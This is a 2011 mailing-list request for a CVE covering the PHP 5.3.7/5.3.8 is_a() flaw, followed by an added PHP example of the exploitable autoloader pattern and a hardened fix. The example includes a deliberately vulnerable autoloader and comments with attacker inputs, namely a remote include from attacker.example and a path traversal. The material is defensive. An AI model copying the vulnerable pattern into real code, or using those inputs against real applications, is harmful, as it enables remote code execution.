Date: Sat, 24 Sep 2011 07:56:34 -0600
From: Vincent Danen <vdanen@...hat.com>
To: oss-security@...ts.openwall.com
Cc: security@....net
Subject: CVE request: is_a() function may allow arbitrary code execution in PHP 5.3.7/5.3.8

Could a CVE be assigned for this flaw?

PHP 5.3.7 changed how the is_a() function worked, and as a result it could
allow for remote arbitrary code execution if certain specific conditions are
met (the blog post referenced below has a good writeup of the flaw).

http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
https://bugs.php.net/bug.php?id=55475
https://bugzilla.redhat.com/show_bug.cgi?id=741020

It looks like this is the fix:

http://svn.php.net/viewvc/?view=revision&revision=317183

Thanks.

-- 
Vincent Danen / Red Hat Security Response Team
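The "certain specific conditions" the request refers to are those recorded in PHP bug #55475: in PHP 5.3.7 and 5.3.8, is_a() given a string as its first argument treats that string as a class name and invokes the registered autoloader with it, so an application that passes request data to is_a() and whose autoloader builds an include path from the class name ends up including an attacker-chosen file. The following PHP is an added illustration of that pattern and of a hardened form; it is not code from the mail, from the linked blog post, or from the PHP project, and the names (naive_autoload, safe_autoload, is_instance_of, the Foo class, the lib/ directory and the type request parameter) are assumed for the example.

```php
<?php
// Added example for the is_a() CVE request; names below are assumed.

// The kind of autoloader that makes the 5.3.7/5.3.8 behaviour exploitable:
// the class name is pasted into an include path with no validation. Shown
// for contrast only; it is NOT registered here.
function naive_autoload($class)
{
    // With $class = "http://attacker.example/x" (allow_url_include=On) this
    // is a remote include; with $class = "../../../tmp/upload" it is a local
    // file include on any configuration.
    include __DIR__ . '/lib/' . $class . '.php';
}

// Vulnerable call pattern: the first argument is untrusted request data, not
// an object. On PHP 5.3.7/5.3.8 is_a() hands that string to the autoloader
// before comparing it with 'Foo'; with naive_autoload() registered, the
// attacker controls what gets included.
function vulnerable_check()
{
    $type = isset($_GET['type']) ? $_GET['type'] : '';
    return is_a($type, 'Foo');
}

// Hardened form, two independent layers.

// Layer 1: never let a string reach is_a(). Only objects are compared, so the
// autoloader can only ever be asked about classes that are already loaded.
// (PHP >= 5.3.9 also ignores string arguments unless is_a()'s third
// parameter, $allow_string, is true; this guard does not rely on that.)
function is_instance_of($value, $class)
{
    if (!is_object($value)) {
        return false;
    }
    return is_a($value, $class);
}

// Layer 2: an autoloader that only accepts plain identifiers and only
// includes a file that exists under its own directory. Even if a string did
// get this far, scheme prefixes, slashes and dot segments are rejected.
function safe_autoload($class)
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_\\\\]*$/', $class)) {
        return;
    }
    $base = __DIR__ . '/lib/';
    $path = $base . str_replace('\\', '/', $class) . '.php';
    // realpath() resolves anything the regex let through and confines the
    // result to the library directory.
    $real = realpath($path);
    if ($real !== false && strpos($real, realpath($base) . '/') === 0) {
        include $real;
    }
}

spl_autoload_register('safe_autoload');

// Usage: an object goes through is_a() as before; request strings never do.
$candidate = isset($_GET['type']) ? $_GET['type'] : '';
var_dump(is_instance_of($candidate, 'Foo'));   // false for any string input
var_dump(is_instance_of(new stdClass(), 'Foo')); // false, and no autoload of 'Foo'
```

The object guard is the fix that matters for the affected versions, since it removes the string-to-autoloader path entirely rather than relying on the autoloader to be careful; the validating autoloader is worth keeping regardless of PHP version, because is_subclass_of() has always accepted class-name strings and any other call that reaches the autoloader with user input has the same exposure.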